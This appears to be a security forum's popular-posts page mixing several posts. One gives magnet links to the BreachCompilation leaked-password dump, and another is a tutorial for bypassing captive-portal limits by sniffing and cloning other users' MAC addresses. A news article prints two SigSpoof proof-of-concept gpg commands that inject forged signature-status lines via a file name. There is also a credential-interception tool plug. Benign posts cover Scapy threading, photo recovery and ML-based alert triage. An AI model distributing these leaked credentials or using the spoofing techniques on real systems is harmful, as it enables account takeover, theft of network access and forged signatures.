
Leaderboard

Popular Content

Showing content with the highest reputation on 06/18/18 in all areas

  1. wordlist created from the original 41G stash via:

     grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt

     Then compressed with:

     7z a breachcompilation.txt.7z breachcompilation.txt

     Size: 4.1G compressed, 9.0G uncompressed. No personal information included - just a list of passwords.

     magnet url:
     magnet:?xt=urn:btih:5a9ba318a5478769ddc7393f1e4ac928d9aa4a71&dn=breachcompilation.txt.7z

     full base:
     magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fglotorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337

     Mirror [944.4 MB, expands to 4.07 GB]

     Source: reddit.com
    1 point
  2. Zero chance of recovering anything.
    1 point
  3. It depends on:
     - how important the photos are
     - what resources you have available (time, knowledge, motivation, money)
     - the iPhone and iOS version
     - when they were deleted

     You can search Google for keywords like "recover iphone deleted photos", "restore deleted iphone photo", "iphone forensics recover deleted files", etc. for ideas. There are also some apps (like dr.fone), but they are weak and generally rely on the phone not yet having synced with iCloud. Before spending money on apps that charge you, read reviews and do your research on Google to see whether they actually help.
    1 point
  4. Free Wifi

     This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. It has been tested on Mac and a Raspberry Pi; it should generally work on Linux, and hasn't been tested on Windows.

     Preparation

     Make sure you do this step before you are stuck without Internet access. Install Python pip. On Linux, also install the Python developer package, a dependency of the netifaces package:

     Ubuntu: $ sudo apt-get install python-dev
     Fedora: $ sudo dnf install python-devel (for CentOS, substitute yum for dnf)

     Make a copy of this repository and install the script's dependencies:

     $ git clone https://github.com/kylemcdonald/FreeWifi
     $ cd FreeWifi && sudo pip install -r requirements.txt

     How to get additional time

     If you had free Internet access but your time has run out, the first thing to try is opening an incognito/private window; instructions are available for Chrome (mobile and desktop), Safari for iOS, Safari for Mac, and Microsoft Edge. An incognito/private window temporarily clears any cookies that may have been used to track how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again.

     Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface, which means you need a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command-line utility makes this easy:

     $ sudo spoof-mac randomize Wi-Fi

     If the command fails to run, enter spoof-mac list --wifi first to check the name of your wireless device, and use that name manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address.

     Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC addresses when searching for wireless networks, to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intent to commit a crime.

     How to get free access

     If the network is open but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine.

     To find the MAC addresses of other devices using the network, you first need to connect to the network; you don't need Internet access, just a connection. On Mac OS, first run sudo chmod o+r /dev/bpf* once so you can sniff wireless data (you need to do this again if you restart your computer). Then run python wifi-users.py.
     You should see a progress bar immediately:

     Available interfaces: en0
     Interface: en0 SSID: nonoinflight
     Available gateways: en0
     Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9
     100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s]
     Total of 5 user(s):
     27:35:96:a8:66:7f 6359 bytes
     36:fe:83:9c:35:eb 9605 bytes
     65:01:3c:cc:20:e8 17306 bytes
     8c:6f:11:2c:f0:ee 20515 bytes
     0a:4f:b2:b8:e8:56 71541 bytes

     If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available.

     Finally, we want to spoof one of these MAC addresses. In this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a working connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience the same connection drop-outs if you are both actively using the network.

     How it works

     wifi-users.py uses tcpdump to collect wireless packets. We then look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and note that MAC as using some amount of data. We then sort the users' MACs by total amount of data and print them out.

     Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy an address, or use ifconfig directly on Linux and OS X; for the specifics, look at the implementations of set_interface_mac inside SpoofMac's interfaces.py (a rough sketch of that approach follows below).

     This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal.

     Source
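     For illustration, here is a minimal Python sketch of the ifconfig approach mentioned above, loosely modeled on what SpoofMac's set_interface_mac does internally. The interface names and the example MAC are placeholders, it needs root, and it assumes ifconfig is installed (some modern Linux distributions ship only ip):

     #!/usr/bin/env python
     # Hypothetical sketch: change an interface's MAC address by shelling
     # out to ifconfig. Interface names and the MAC below are placeholders.
     import subprocess
     import sys

     def set_interface_mac(interface, mac):
         """On macOS a single `ifconfig en0 ether <mac>` suffices; on Linux
         the interface is brought down, changed, and brought back up."""
         if sys.platform == "darwin":
             subprocess.check_call(["ifconfig", interface, "ether", mac])
         else:
             subprocess.check_call(["ifconfig", interface, "down"])
             subprocess.check_call(["ifconfig", interface, "hw", "ether", mac])
             subprocess.check_call(["ifconfig", interface, "up"])

     if __name__ == "__main__":
         # e.g. sudo python set_mac.py wlan0 0a:4f:b2:b8:e8:56
         set_interface_mac(sys.argv[1], sys.argv[2])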
    1 point
  5. Scapy is an incredible tool when it comes to playing with the network. As its official website says, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is sniffing the network packets passing through a computer's NIC. Below is a small example:

     from scapy.all import *

     interface = "eth0"

     def print_packet(packet):
         ip_layer = packet.getlayer(IP)
         print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

     print("[*] Start sniffing...")
     sniff(iface=interface, filter="ip", prn=print_packet)
     print("[*] Stop sniffing")

     This little sniffer displays the source and the destination of all packets having an IP layer:

     $ sudo python3 sniff_main_thread.py
     [*] Start sniffing...
     [!] New Packet: 10.137.2.30 -> 10.137.2.1
     [!] New Packet: 10.137.2.30 -> 10.137.2.1
     [!] New Packet: 10.137.2.1 -> 10.137.2.30
     [!] New Packet: 10.137.2.1 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     ^C[*] Stop sniffing

     It will continue to sniff network packets until it receives a keyboard interrupt (CTRL+C). Now, let's look at a new example:

     from scapy.all import *
     from threading import Thread
     from time import sleep

     class Sniffer(Thread):
         def __init__(self, interface="eth0"):
             super().__init__()
             self.interface = interface

         def run(self):
             sniff(iface=self.interface, filter="ip", prn=self.print_packet)

         def print_packet(self, packet):
             ip_layer = packet.getlayer(IP)
             print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

     sniffer = Sniffer()

     print("[*] Start sniffing...")
     sniffer.start()

     try:
         while True:
             sleep(100)
     except KeyboardInterrupt:
         print("[*] Stop sniffing")
         sniffer.join()

     This piece of code does exactly the same thing as the previous one, except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer:

     $ sudo python3 sniff_thread_issue.py
     [*] Start sniffing...
     [!] New Packet: 10.137.2.30 -> 10.137.2.1
     [!] New Packet: 10.137.2.30 -> 10.137.2.1
     [!] New Packet: 10.137.2.1 -> 10.137.2.30
     [!] New Packet: 10.137.2.1 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     [!] New Packet: 216.58.198.68 -> 10.137.2.30
     [!] New Packet: 10.137.2.30 -> 216.58.198.68
     ^C[*] Stop sniffing
     ^CTraceback (most recent call last):
       File "sniff_thread_issue.py", line 25, in <module>
         sleep(100)
     KeyboardInterrupt

     During handling of the above exception, another exception occurred:

     Traceback (most recent call last):
       File "sniff_thread_issue.py", line 28, in <module>
         sniffer.join()
       File "/usr/lib/python3.5/threading.py", line 1054, in join
         self._wait_for_tstate_lock()
       File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
         elif lock.acquire(block, timeout):
     KeyboardInterrupt
     ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'>
     Traceback (most recent call last):
       File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown
         t.join()
       File "/usr/lib/python3.5/threading.py", line 1054, in join
         self._wait_for_tstate_lock()
       File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
         elif lock.acquire(block, timeout):
     KeyboardInterrupt

     When CTRL+C is pressed, a SIGINT signal is sent to the process executing the Python script, triggering its exit routine. However, as the official documentation about signals explains, only the main thread receives signals. As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception; the sniffing thread continues its infinite sniffing loop, blocking the call to sniffer.join() at the same time.

     So, how can the sniffing thread be stopped if not by signals? Let's have a look at this next example:

     from scapy.all import *
     from threading import Thread, Event
     from time import sleep

     class Sniffer(Thread):
         def __init__(self, interface="eth0"):
             super().__init__()
             self.interface = interface
             self.stop_sniffer = Event()

         def run(self):
             sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer)

         def join(self, timeout=None):
             self.stop_sniffer.set()
             super().join(timeout)

         def should_stop_sniffer(self, packet):
             return self.stop_sniffer.isSet()

         def print_packet(self, packet):
             ip_layer = packet.getlayer(IP)
             print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

     sniffer = Sniffer()

     print("[*] Start sniffing...")
     sniffer.start()

     try:
         while True:
             sleep(100)
     except KeyboardInterrupt:
         print("[*] Stop sniffing")
         sniffer.join()

     As you may have noticed, we are now using the stop_filter parameter of the sniff function. This parameter expects a function that will be called after each new packet to decide whether the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose; it is set to true when the join method is called to stop the thread. Is this the end of the story? Not really...

     $ sudo python3 sniff_thread_issue_2.py
     [*] Start sniffing...
     ^C[*] Stop sniffing
     [!] New Packet: 10.137.2.30 -> 10.137.2.1

     One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer goes back to its infinite sniffing loop and waits for the next packet. This is why the sniffer stopped one packet after the keyboard interrupt. A solution would be to force the sniffing thread to stop.

     As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose. However, even if this solution works, the thread won't release the resources it might hold: the sniff function uses a socket which is released just before exiting, after the sniffing loop:

     try:
         while sniff_sockets:
             ...  # sniffing loop
     except KeyboardInterrupt:
         pass
     if opened_socket is None:
         for s in sniff_sockets:
             s.close()
     return plist.PacketList(lst, "Sniffed")

     Therefore, the solution I suggest is to open the socket outside the sniff function and pass it in as a parameter. This makes it possible to force-stop the sniffing thread while still closing its socket properly:

     from scapy.all import *
     from threading import Thread, Event
     from time import sleep

     class Sniffer(Thread):
         def __init__(self, interface="eth0"):
             super().__init__()
             self.daemon = True
             self.socket = None
             self.interface = interface
             self.stop_sniffer = Event()

         def run(self):
             self.socket = conf.L2listen(
                 type=ETH_P_ALL,
                 iface=self.interface,
                 filter="ip"
             )

             sniff(
                 opened_socket=self.socket,
                 prn=self.print_packet,
                 stop_filter=self.should_stop_sniffer
             )

         def join(self, timeout=None):
             self.stop_sniffer.set()
             super().join(timeout)

         def should_stop_sniffer(self, packet):
             return self.stop_sniffer.isSet()

         def print_packet(self, packet):
             ip_layer = packet.getlayer(IP)
             print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

     sniffer = Sniffer()

     print("[*] Start sniffing...")
     sniffer.start()

     try:
         while True:
             sleep(100)
     except KeyboardInterrupt:
         print("[*] Stop sniffing")
         sniffer.join(2.0)

         if sniffer.isAlive():
             sniffer.socket.close()

     Et voilà! After a keyboard interrupt, the main thread now waits up to 2 seconds for the sniffing thread, giving the sniff function time to terminate on its own; after that, the sniffing thread is force-stopped (it is a daemon thread) and its socket is properly closed from the main thread.

     Source
    1 point
  6. NetRipper - Added support for Chrome 67 (32-bit and 64-bit) https://github.com/NytroRST/NetRipper
    1 point
  7. SigSpoof flaw fixed in GnuPG, Enigmail, GPGTools, and python-gnupg.

     For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs.

     Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone's public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without forensic analysis that's beyond the ability of many users.

     Backups and software updates affected, too

     The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may in fact have been spoofs. It also has the potential to affect uses that went well beyond encrypted email. CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online (including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare) turn it on.

     Once verbose is enabled, researcher Marcus Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others. The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is a public key or key ID.

     The attacks are relatively easy to carry out. The code for one of Brinkmann's PoC exploits, which forges the digital signature of Enigmail developer Patrick Brunschwig, is:

     $ echo 'Please send me one of those expensive washing machines.' \
     | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
     \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
     \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
     \n[GNUPG:] TRUST_FULLY 0 classic\
     \ngpg: '\'`" > poc1.msg

     A second exploit is:

     $ echo "See you at the secret spot tomorrow 10am." \
     | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
     \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
     \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
     \n[GNUPG:] TRUST_FULLY\
     \n[GNUPG:] BEGIN_DECRYPTION\
     \n[GNUPG:] DECRYPTION_OKAY\
     \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
     \ngpg: '\'`" > poc2.msg

     Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after the developers of the tools known to be vulnerable had patched them. The flaws are patched in GnuPG 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python-gnupg 0.4.3 (a quick version check is sketched below). People who want to know the status of other applications that use OpenPGP should check with the developers.

     Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as those bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook.

     Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019, affecting Enigmail, can be triggered even when the verbose setting isn't enabled; it, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extension scripts, potentially allowing access to passwords or execution of malicious code. The fix is here.

     Via arstechnica.com
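     As a quick sanity check, one might compare the locally installed GnuPG against the patched 2.2.8 release. A minimal sketch, assuming the usual "gpg (GnuPG) X.Y.Z" first line of gpg --version:

     #!/usr/bin/env python
     # Minimal sketch: check whether local GnuPG is at least 2.2.8, the
     # release that patches CVE-2018-12020. Assumes `gpg --version` prints
     # a first line of the form "gpg (GnuPG) 2.2.8".
     import subprocess

     PATCHED = (2, 2, 8)

     def gpg_version():
         first_line = subprocess.check_output(["gpg", "--version"]).decode().splitlines()[0]
         return tuple(int(x) for x in first_line.split()[-1].split("."))

     if __name__ == "__main__":
         version = gpg_version()
         status = "patched" if version >= PATCHED else "VULNERABLE - update GnuPG"
         print("gpg %s: %s" % (".".join(map(str, version)), status))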
    1 point
  8. Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks.

     The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the "Analyze/Decide" block in Figure 1.

     Figure 1: Basic SOC triage stages

     In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow, all with the ultimate goal of automating alert triage and freeing up analyst time.

     Reverse Engineering the Analyst

     Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine whether the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore whether, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones.

     Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as "malicious" or "benign". How can we capture the analysis used to determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence?

     Basic Supervised Model Process

     The data science term for this is a "Supervised Classification Model". It is "supervised" in the sense that it learns by being shown data already labeled as benign or malicious, and it is a "classification model" in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two "classes" of alerts: malicious and benign.

     In order to begin creating such a model, a dataset must be collected. This dataset forms the "experience" of the model, and is the information we will use to "train" the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign.
     Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or "labeling") thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts.

     Once a labeled dataset has been defined, the next step is to define "features" that can be used to portray the information resident in each alert. A "feature" can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural "feature" could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision.

     Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a "test set" to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known.

     Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance.

     Feature Engineering

     Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is "easy", we ask: "Why? And what helps you make that decision?" It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis.

     For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields:

     - Process Path
     - Process MD5
     - Parent Process
     - Process Command Arguments

     While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields. Beginning with the process path of, say, "C:\windows\temp\m.exe", an analyst can immediately see some features:

     - The process resides in a temporary folder: C:\windows\temp\
     - The process is two directories deep in the file system
     - The process executable name is one character long
     - The process has an .exe extension
     - The process is not a "common" process name

     While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to "teach" the model to view processes the way an analyst does. The features are then encoded into a more discrete representation, similar to this (a rough extraction sketch is shown after the table):

     Temp_folder | Depth | Name_Length | Extension | common_process_name
     TRUE        | 2     | 1           | exe       | FALSE
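     The following is an illustrative sketch (not FireEye's actual code) of how the path features above might be computed for "C:\windows\temp\m.exe"; the toy list of common process names is a placeholder:

     #!/usr/bin/env python
     # Illustrative sketch of encoding the process-path features listed above.
     import ntpath

     COMMON_PROCESS_NAMES = {"svchost.exe", "explorer.exe", "chrome.exe"}  # toy list

     def path_features(process_path):
         folder, name = ntpath.split(process_path.lower())
         stem, ext = ntpath.splitext(name)
         return {
             "temp_folder": "\\temp" in folder,
             "depth": folder.count("\\"),   # directories below the drive root
             "name_length": len(stem),
             "extension": ext.lstrip("."),
             "common_process_name": name in COMMON_PROCESS_NAMES,
         }

     if __name__ == "__main__":
         print(path_features(r"C:\windows\temp\m.exe"))
         # -> {'temp_folder': True, 'depth': 2, 'name_length': 1,
         #     'extension': 'exe', 'common_process_name': False}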
     Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from the expected "lineage" can be a strong indicator of malicious activity. Say the parent process of the aforementioned example was 'powershell.exe'. A potential new feature could then be derived from the concatenation of the parent process and the process itself: 'powershell.exe_m.exe'. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact.

     The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-trodden space in predictive analytics. We can look for things including, but not limited to:

     - Network connection strings (such as 'http://', 'https://', 'ftp://')
     - Base64 encoded commands
     - References to registry keys ('HKLM', 'HKCU')
     - Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon's work for more)

     The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships. For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue).

     Figure 2: Distribution of Process Event alerts grouped by Process Command Length

     This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious; this manifests as red on the right and blue on the left. However, process length is not the only factor. As part of our feature set, we also thought it would be useful to approximate the "complexity" of each command. For this, we used "Shannon entropy", a commonly used metric that measures the degree of randomness present in a string of characters (a small sketch of this metric follows below). Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious.

     Figure 3: Distribution of Process Event alerts grouped by entropy
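     For reference, this is a minimal sketch of the Shannon entropy metric mentioned above, in bits per character; the two example commands are invented:

     #!/usr/bin/env python
     # Minimal sketch of Shannon entropy: degree of randomness in a string.
     import math
     from collections import Counter

     def shannon_entropy(s):
         counts = Counter(s)
         total = float(len(s))
         return -sum((n / total) * math.log(n / total, 2) for n in counts.values())

     if __name__ == "__main__":
         # A plain command typically scores lower than an encoded one.
         print(shannon_entropy("notepad.exe C:\\notes.txt"))
         print(shannon_entropy("powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA"))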
     Model Selection and Generalization

     Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious.

     For our use case, it also made sense to prioritize an 'interpretable' model, that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well suited for alert classification.

     There are many publicly available resources to learn about decision trees, but the basic intuition is that a decision tree is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game "Twenty Questions" is familiar with this concept: initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow them down. After enough questions are asked and answered, the 'questioner' feels they have a high probability of guessing the right answer. Figure 4 shows an example of a decision tree that one might use to evaluate process executions.

     Figure 4: Decision tree for deciding whether an alert is benign or malicious

     For the example alert in the diagram, the "decision path" is marked in red. This is how this decision tree model makes a prediction. It first asks: "Is the length greater than 100 characters?" If so, it moves to the next question, "Does it contain the string 'http'?", and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious.

     Because they can ask such detailed combinations of questions, it is possible for decision trees to "overfit", or learn rules that are too closely tied to the training set. This reduces the model's ability to "generalize" to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each "vote" on the outcome. This "ensemble" of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model.

     How the SOC Alert Model Works

     When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this "feature vector" and applies a confidence level to the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign.

     Figure 5: An alert presented to the analyst with its raw values captured

     As an example, the event shown in Figure 5 might create the following feature values:

     - Parent Process: 'wscript'
     - Command Entropy: 5.08
     - Command Length: 103

     Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal "leaf" classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification.

     For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into "why" the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the "explanation" for this alert might look like:

     Command Entropy = 5.08 > 4.60: 51.73% Threat
     occuranceOfChar "\" = 9.00 > 4.50: 64.09% Threat
     occuranceOfChar ")" (= 0.00) <= 0.50: 78.69% Threat
     NOT processTree = "cmd.exe_to_cscript.exe": 99.6% Threat

     Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance. (A minimal training-and-scoring sketch follows below.)
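     The following is a hypothetical end-to-end sketch of the workflow described above, training a Random Forest on labeled feature vectors, scoring a new alert, and reading off overall feature importances. The dataset and feature names are stand-ins, not real SOC data or FireEye's implementation:

     #!/usr/bin/env python
     # Hypothetical sketch: train a Random Forest on labeled alert feature
     # vectors and score a new alert. X, y, feature names are stand-ins.
     import numpy as np
     from sklearn.ensemble import RandomForestClassifier
     from sklearn.model_selection import train_test_split

     feature_names = ["command_length", "command_entropy", "temp_folder", "depth"]

     # Toy dataset: rows are alerts, columns follow feature_names; 1 = malicious.
     X = np.array([[103, 5.08, 1, 2], [23, 3.1, 0, 4],
                   [180, 5.90, 1, 2], [40, 3.4, 0, 3]] * 50, dtype=float)
     y = np.array([1, 0, 1, 0] * 50)

     # Hold out a test set so the model is evaluated on alerts it has never seen.
     X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)

     model = RandomForestClassifier(n_estimators=100, random_state=0)
     model.fit(X_train, y_train)
     print("test accuracy:", model.score(X_test, y_test))

     # Score a new alert and show which features the forest leaned on overall.
     new_alert = np.array([[103, 5.08, 1, 2]])
     print("P(malicious):", model.predict_proba(new_alert)[0][1])
     print(dict(zip(feature_names, model.feature_importances_.round(3))))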
     How the SOC Uses the Model

     Showing the features the model used to reach its conclusion allows experienced analysts to compare their approach with the model's and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they might otherwise have missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned from the collective experience of every analyst over thousands of alerts. The model therefore provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues.

